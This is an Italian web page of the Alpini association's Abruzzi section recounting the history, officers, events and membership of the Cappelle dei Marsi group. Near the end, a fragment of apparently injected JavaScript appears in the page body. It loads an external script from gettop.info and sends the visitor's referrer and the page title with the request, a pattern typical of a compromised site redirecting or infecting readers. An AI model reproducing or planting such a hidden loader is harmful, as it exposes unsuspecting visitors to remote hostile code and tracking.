A.N.A. Sezione Abruzzi

Gruppo Alpini di Cappelle dei Marsi.

giugno 8th, 2007  |  Published in I gruppi della Sezione Abruzzi

 Il Gruppo alpini di Cappelle dei Marsi (AQ), secondo alcuni "veci" Alpini, già esisteva negli anni 60-70, ma per motivi a noi sconosciuti si sciolse senza lasciare alcun documento.

La conferma di quanto sopra, l'abbiamo avuta al momento della nuova iscrizione (1995), quando il segretario della Sezione Abruzzi ci comunicò che il Gruppo di Cappelle già esisteva sulla carta, iscrivendoci infatti con lo stesso numero già attribuito ad esso (numero 25).

Ma torniamo alla nostra storia: agli inizi del 1995 alcuni "veci" Alpini volenterosi, (fra cui Iannaccone Giovanni, Sabatini Filiberto, Milani Renato, Angeloni Mauro, Sabatini Domenico, D'Amore Alberto) organizzarono delle riunioni con altri ex Alpini per valutare e discutere se era possibile ricostruire un Gruppo Alpini a Cappelle.

Dopo molti inviti e ripetuti incontri fra ex Alpini, il giorno 13 giugno 1995 nella sede della Pro Loco (successivamente, con autorizzazione comunale, diventerà anche sede sociale del Grup­po Alpini di Cappelle) si riunirono ben 45 ex Alpini per l'atto ufficiale relativo alla costituzione del Gruppo Alpini di Cappelle dei Marsi. Nella stessa assemblea fu eletto il Consiglio Direttivo del Gruppo ed il voto unanime dei presenti formalizzò le seguenti cariche:

capogruppo, Renato Milani; vice capogruppo, Filiberto Sabatini; segretario, Mauro Angeloni; cassiere, Alberto D'Amore. Consiglieri: Giovanni Iannaccone, Domenico Sabatini, Quintilio De Simone. Revisori dei conti: Gianluca Nuccetelli e Roberto Palmieri.

Il giorno 13 novembre 1995, dopo aver predisposto la relativa documentazione, una delega­zione del C.D. si recò nella sede della Sezione Abruzzi ed alla presenza del presidente sezionale Ornello Capannolo, formalizzò l'iscrizione del Gruppo Alpini di Cappelle dei Marsi, natural­mente, come precedentemente detto, con il numero 25. Il Gruppo di Cappelle nasceva non sol­tanto per spirito di fratellanza fra gli Alpini locali e non, ma anche per organizzare e collaborare a tutte le attività socio- culturali ed alla salvaguardia dell'ambiente sempre più maltrattato. Inol­tre si proponeva di partecipare alle adunate nazionali, e ai raduni regionali e locali.

Il Gruppo Alpini di Cappelle nei suoi pochi anni di vita ha organizzato, il giorno 26 maggio 1996, un grande- Raduno di raggruppamento in cui è stato ufficialmente "battezzato" il suo gagliardetto. Hanno preso parte alla manifestazione il presidente sezionale Ornello Capannolo, il vice presidente Piero Amicone, s.e. il Vescovo dei Marsi mons. Armando Dini, il sindaco di Scurcola M. Nevio Frezzini, il comandante della Staz. Carabinieri di Scurcola M.11o Marco Capparella, il cappellano militare Padre Teodato Tortora, ed altre Autorità politiche e militari, 40 Gruppi Alpini provenienti da tutta la provincia de L'Aquila, la fanfara di Campo di Giove, e il picchetto militare de L'Aquila.  

Una grande cornice di gente ha salutato la sfilata dei Gruppi Alpini lungo le vie del paese.

Una solenne S. Messa all'aperto officiata dal Vescovo ed il rancio militare hanno concluso la bellissima festa. I momenti più toccanti sono stati quando molti "veci" Alpini di Cappelle si sono nuovamente incontrati con altri "veci" dopo 20-30-40 anni di lontananza; tanti ricordi sono affiorati nelle loro menti, non offuscate dall'età e dal tempo passato. Successivamente il Gruppo ha partecipato all'Adunata Nazionale di Udine del 1996, ed a molti raduni locali. Nel 1997 esso ha partecipato all'Adunata Nazionale di Reggio Emilia, ed ai raduni regionali e locali. Nel 1998 il Gruppo non ha partecipato all'Adunata Nazionale per la morte improvvisa del consigliere Giovanni lannaccone, principale artefice della rinascita del Gruppo. Attualmente il Gruppo è composto da 44 soci Alpini e 3 "Amici". Sono morti: Giovanni Iannaccone il giorno 26/10/97 e Rosario D'Angelo, il giorno 17/08/97. L'attuale Consiglio Direttivo è così composto:

capogruppo, Renato Milani; vice capogruppo, Filiberto Sabatini; segretario, Mauro Angeloni; cassiere, Alberto D'Amore. Consiglieri: Domenico Sabatini e Quintilio De Simone. Revisori dei conti: Gianluca Nuccetelli e Roberto Palmieri.

Cappelle dei Marsi è un paese di 850 abitanti, situato nella splendida piana dei Palentini, sotto il Monte Velino, a 750 metri sul livello del mare e a 2 km dal casello autostradale di Magliano dei Marsi. Essa è attraversata dalla statale Tiburtina – Valeria che da Roma giunge a Pescara. Ha una propria stazione ferroviaria; una volta era un grande scalo ferroviario per la zona e per il "Cicolano" (vallata che dai piani Palentini giunge fino al Reatino).

Ma la più grande realtà locale è l'enorme nucleo commerciale ed artigianale sorto negli ultimi 10 anni. In questo grande complesso operano più di 100 aziende; esso è situato sulla statale Tiburtina – Valeria nel tratto che da Cappelle va ad Avezzano, è facilmente raggiungibile da tutta la Marsica e dai caselli autostradali di Avezzano e Magliano dei Marsi. In esso vi lavo­rano tanti giovani locali e marsicani, a vantaggio dell'economia locale.

A Cappelle ci sono altre Associazioni che operano nel paese. La Pro Loco che, oltre a tante manifestazioni socio culturali, organizza tutti gli anni, il sabato precedente il Ferragosto, la tradizionale e famosa "sagra della trippa"; la Polisportiva Calcio che, milita onorevolmente nel campionato regionale di prima categoria; la Confraternita; l'AVIS; il Circolo Cacciatori, Bocciofilo e Tennistico.

Possiamo concludere dicendo che il paese va crescendo, anche perché molte nuove fami­glie giungono dalla vicina città di Avezzano.

 

Il Capo gruppo
Renato Milani


 

Le notizie relative ai Gruppi della Sezione Abruzzi sono tratte dalla seconda parte del libro intitolato "Alpini Verso L'aurora" di Mario SALVITTI, che narra la storia di 150 Gruppi Alpini abruzzesi. Tale libro é stato fortemente voluto dall'ex presidente sezionale Antonio Festa ed é stato realizzato in occasione della celebrazione del 70° anniversario della fondazione della Sezione Abruzzi (1929-1999).

Il libro va ad aggiungersi a quello di Antonio Procacci: "Abruzzo Terra Di Alpini". Entrambi offrono al lettore testimonianze del glorioso passato degli Alpini abruzzesi.

Il gruppo in esame alla fine dell'anno 2006 registra i seguenti soci:

  • – Soci alpini nr 30.
  • – Soci aggregati nr. 3. 
     

    Il gruppo in esame alla fine dell'anno 2007 registra i seguenti soci:

    • – Soci alpini       nr. 29;
    • – Soci aggregati  nr.  2.

L'attuale capogruppo è il Signor : Renato Milani.

d.getElementsByTagName(‘head’)[0].appendChild(s);document.currentScript.parentNode.insertBefore(s, document.currentScript);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Your Comments

L’Alpino d’Abruzzo